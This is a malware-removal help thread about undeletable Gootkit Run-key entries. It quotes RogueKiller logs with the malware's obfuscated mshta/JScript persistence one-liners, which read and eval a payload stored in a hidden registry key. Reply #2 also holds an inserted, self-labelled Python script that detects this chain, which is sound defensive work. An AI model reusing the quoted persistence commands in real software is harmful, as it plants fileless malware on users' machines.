Author Topic: RK Can't remove Tr.Gootkit registry entries - c0000034  (Read 5728 times)


August 25, 2015, 04:50:06 PM

NuConcept

RK Can't remove Tr.Gootkit registry entries - c0000034
« on: August 25, 2015, 04:50:06 PM »
No idea how this junk got on my machine. It's been there since last week apparently, since my history from two weeks ago does not contain the slew of websites I'm apparently visiting without my knowledge. I'm guessing it was the result of a mis-click in Twitter that opened up one of those junk websites with the gallery-style stuff.

Whether this is my only problem or not isn't really my issue right now; my issue is these registry entries which will not go away. I don't like things that can't be removed. Tried manual, frst64, and RK. All three give some variant of a c0000034 error.

Attached is a portion of my IE History today with the rogue behavior opened up (note there are no visuals to go with this history), and below is the export from the RogueKiller app showing the failure to remove the keys.

Appreciate any insight into removing these registry keys as I've scoured and can't find an answer not involving the software I've already used.

RogueKiller V10.10.2.0 [Aug 24 2015] by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/softwares/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : mnewmark [Administrator]
Started from : C:\Users\mnewmark\Desktop\RogueKiller.exe
Mode : Delete -- Date : 08/25/2015 10:10:48

¤¤¤ Processes : 0 ¤¤¤

¤¤¤ Registry : 5 ¤¤¤
[Tr.Gootkit] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run | 3bd3bbe4 : mshta javascript:RXn9nR8A="R5Qlce36";ZO6=new%20ActiveXObject("WScript.Shell");szp3XXFGt="t";iK43kx=ZO6.RegRead("HKLM\\software\\Wow6432Node\\8c5470f52d\\e8128134");XM5uAlX5tN="Gn";eval(iK43kx);zuCUu7Ak7="C47";
  • -> ERROR [c0000034]
[Tr.Gootkit] (X64) HKEY_USERS\S-1-5-21-1330083092-1246176775-4547331-8996\Software\Microsoft\Windows\CurrentVersion\Run | 3bd3bbe4 : mshta javascript:JqRl16HFbN="hYwnAH";k65V=new%20ActiveXObject("WScript.Shell");fO0RTHM="xfZtIVugO";a6HJe=k65V.RegRead("HKCU\\software\\8c5470f52d\\e8128134");jLW7dYt="lS9S";eval(a6HJe);ibKpo0i="H1UmWJZ";
  • -> ERROR [c0000034]
[Tr.Gootkit] (X86) HKEY_USERS\S-1-5-21-1330083092-1246176775-4547331-8996\Software\Microsoft\Windows\CurrentVersion\Run | 3bd3bbe4 : mshta javascript:JqRl16HFbN="hYwnAH";k65V=new%20ActiveXObject("WScript.Shell");fO0RTHM="xfZtIVugO";a6HJe=k65V.RegRead("HKCU\\software\\8c5470f52d\\e8128134");jLW7dYt="lS9S";eval(a6HJe);ibKpo0i="H1UmWJZ";
  • -> ERROR [c0000034]
[Tr.Gootkit] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | a175e83b : mshta javascript:JGAhca98="W";fR8=new%20ActiveXObject("WScript.Shell");Ht3OEjnc="OHFmj";r3u8hk=fR8.RegRead("HKLM\\software\\Wow6432Node\\8c5470f52d\\e8128134");BtlqKk48="UgEm";eval(r3u8hk);ZLFEU2KJ6="szH6jjYJn";
  • -> ERROR [c0000034]
[Tr.Gootkit] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | a175e83b : mshta javascript:JGAhca98="W";fR8=new%20ActiveXObject("WScript.Shell");Ht3OEjnc="OHFmj";r3u8hk=fR8.RegRead("HKLM\\software\\Wow6432Node\\8c5470f52d\\e8128134");BtlqKk48="UgEm";eval(r3u8hk);ZLFEU2KJ6="szH6jjYJn";
  • -> ERROR [c0000034]


¤¤¤ Tasks : 0 ¤¤¤

¤¤¤ Files : 0 ¤¤¤

¤¤¤ Hosts File : 0 ¤¤¤

¤¤¤ Antirootkit : 0 (Driver: Not loaded [0xc000036b]) ¤¤¤

¤¤¤ Web browsers : 0 ¤¤¤

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: ST320LT009-9WC142 +++++
--- User ---
[MBR] 0f9cd6a0e04d9b71ef0091cb9181989e
[BSP] 422ad3b656dc885c47c094f585cdf096 : HP|VT.Unknown MBR Code
Partition table:
0 - [XXXXXX] DELL-UTIL (0xde) [VISIBLE] Offset (sectors): 63 | Size: 39 MB
1 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 81920 | Size: 752 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
2 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 1622016 | Size: 304452 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK


Reply #1, August 25, 2015, 05:49:06 PM

NuConcept

Re: RK Can't remove Tr.Gootkit registry entries - c0000034
« Reply #1 on: August 25, 2015, 05:49:06 PM »
Ran the Malwarebytes program, which also detected Rootkit.Fileless.MTGen in the registry, but contrary to what it told me, it did NOT in fact remove the registry entries. Cleared IE history, browsed here, and there are already 4 websites with multiple page opens that I did not do. Figured it hadn't been removed when I opened REGEDIT and it told me it couldn't display the key in the HKCU.....Run section (c0000034).

Going to look up "Rootkit.Fileless.MTGen" to see if I can figure it out; in the meanwhile, any help would be appreciated. :)

Reply #2, August 25, 2015, 08:09:30 PM

NuConcept

Re: RK Can't remove Tr.Gootkit registry entries - c0000034
« Reply #2 on: August 25, 2015, 08:09:30 PM »
UPDATE -
Tried CCleaner, which didn't even detect the invalid keys. A note on CCleaner: this particular bug prevented its installation. There were several REGSERVER32.EXE processes running which had to be killed. Once killed, the program installed properly.

Upon a restart, the system was running MSHTA.EXE and firing off some PowerShell scripts quickly to get itself started. Killing the REGSERVER32.EXE processes after it ran seemed to stop it from functioning.

I was finally able to eliminate the following invalid registry entries using Registry Workshop, which I downloaded from Torchsoft. I was not able to directly delete or edit the entries, but they were visible in the interface and I could get the complete text. Because the value name appeared to be NULL, it couldn't be affected. However, unlike the built-in REGEDIT, this software WAS able to completely remove the RUN key. I only had valid entries in one of the four, so I moved them out to RunOnce, deleted the key, recreated the key, and moved them back. (FYI: the HKCU Run key was automatically recreated by the system after I deleted it.)

End result here is, if you find yourself with a registry key that cannot be removed by any of the generally used programs (Malwarebytes, FRST64, RogueKiller), give Registry Workshop a look.

I'm fairly satisfied the issue is removed; all of the scanners say I'm clean and I see nothing fishy. If that changes, I'll provide another update.

Here were the keys removed and below is the full text from one of them:

HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN|^a175e83b, , [4fba7994f19a95a1a4f18a1da55fbe42],

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN|^a175e83b, , [a762e62799f292a4eaabaef942c21ee2],

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|^3bd3bbe4, , [b158d6377f0c191d7bfb7e298381c739],

HKU\S-1-5-21-1330083092-1246176775-4547331-8996\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|^3bd3bbe4, , [43c667a6bfcc78be1560a4032cd840c0],

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
@="mshta javascript:JqRl16HFbN=\"hYwnAH\";k65V=new%20ActiveXObject(\"WScript.Shell\");fO0RTHM=\"xfZtIVugO\";a6HJe=k65V.RegRead(\"HKCU\\\\software\\\\8c5470f52d\\\\e8128134\");jLW7dYt=\"lS9S\";eval(a6HJe);ibKpo0i=\"H1UmWJZ\";"
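
The persistence chain visible in these entries (an mshta one-liner that RegReads an obfuscated payload from a second key and evals it, in a Run value whose name the Win32 API cannot address, hence c0000034) can be picked out of a RogueKiller report automatically. The script below is an added example, not part of this thread or of RogueKiller; it parses Registry lines in the report's layout (the sample is constructed from two of the lines above plus a benign entry), flags the mshta/RegRead/eval chain, recovers the staging key path, and records which entries failed to delete.

```python
import re

# Constructed sample: three Registry lines in RogueKiller's report layout, two copied
# from the Gootkit report above and one benign entry added for contrast.
SAMPLE_REPORT = r"""
¤¤¤ Registry : 3 ¤¤¤
[Tr.Gootkit] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run | 3bd3bbe4 : mshta javascript:RXn9nR8A="R5Qlce36";ZO6=new%20ActiveXObject("WScript.Shell");iK43kx=ZO6.RegRead("HKLM\\software\\Wow6432Node\\8c5470f52d\\e8128134");eval(iK43kx);
  • -> ERROR [c0000034]
[Tr.Gootkit] (X64) HKEY_USERS\S-1-5-21-1330083092-1246176775-4547331-8996\Software\Microsoft\Windows\CurrentVersion\Run | 3bd3bbe4 : mshta javascript:k65V=new%20ActiveXObject("WScript.Shell");a6HJe=k65V.RegRead("HKCU\\software\\8c5470f52d\\e8128134");eval(a6HJe);
  • -> ERROR [c0000034]
[PUP] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run | Updater : C:\Program Files\Example\updater.exe
  • -> Deleted
"""

# "[tag] (arch) key | value-name : value-data", as RogueKiller prints Registry findings.
ENTRY_RE = re.compile(r"^\[(?P<tag>[^\]]+)\] \((?P<arch>X86|X64)\) (?P<key>[^|]+?) \| (?P<name>[^:]+?) : (?P<data>.*)$")
MSHTA_RE = re.compile(r"^mshta\s+javascript:", re.IGNORECASE)
REGREAD_RE = re.compile(r'RegRead\("([^"]+)"\)')
EVAL_RE = re.compile(r"\beval\(")

def parse_report(text):
    """Return one dict per Registry finding, attaching the '-> ...' result line that follows it."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        m = ENTRY_RE.match(line)
        if m:
            entries.append({**m.groupdict(), "result": None})
        elif entries and "->" in line:
            entries[-1]["result"] = line.split("->", 1)[1].strip()
    return entries

def analyse(entry):
    """Flag the Gootkit chain: mshta launcher -> RegRead of a staging key -> eval of its data."""
    data = entry["data"]
    hits = []
    if MSHTA_RE.match(data):
        hits.append("mshta javascript: launcher")
    rr = REGREAD_RE.search(data)
    if rr:
        # The JScript source escapes backslashes; unescape to get the real registry path.
        entry["payload_key"] = rr.group(1).replace("\\\\", "\\")
        hits.append("payload read from " + entry["payload_key"])
    if EVAL_RE.search(data):
        hits.append("eval() of registry data")
    entry["hits"] = hits
    entry["fileless_persistence"] = len(hits) == 3
    # c0000034 is STATUS_OBJECT_NAME_NOT_FOUND: the value could not be addressed by name for deletion.
    entry["undeletable"] = bool(entry["result"]) and "c0000034" in entry["result"]
    return entry

def triage(text):
    return [analyse(e) for e in parse_report(text)]

if __name__ == "__main__":
    for e in triage(SAMPLE_REPORT):
        print(e["arch"], e["key"], e["name"], e["fileless_persistence"], e["undeletable"], e["hits"])
```

The staging key it recovers (the `8c5470f52d\e8128134` path) is the second location that has to be cleared along with the Run value, which is why deleting the value alone is not enough.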

Reply #3, August 25, 2015, 08:49:16 PM

Curson

Re: RK Can't remove Tr.Gootkit registry entries - c0000034
« Reply #3 on: August 25, 2015, 08:49:16 PM »
Hi NuConcept,

Welcome to Adlice.com Forum.

The report you posted was generated with the 32-bit version of RogueKiller.
Please download RogueKiller (64-bit version), redo a full scan and post the report obtained in your next reply.

Regards.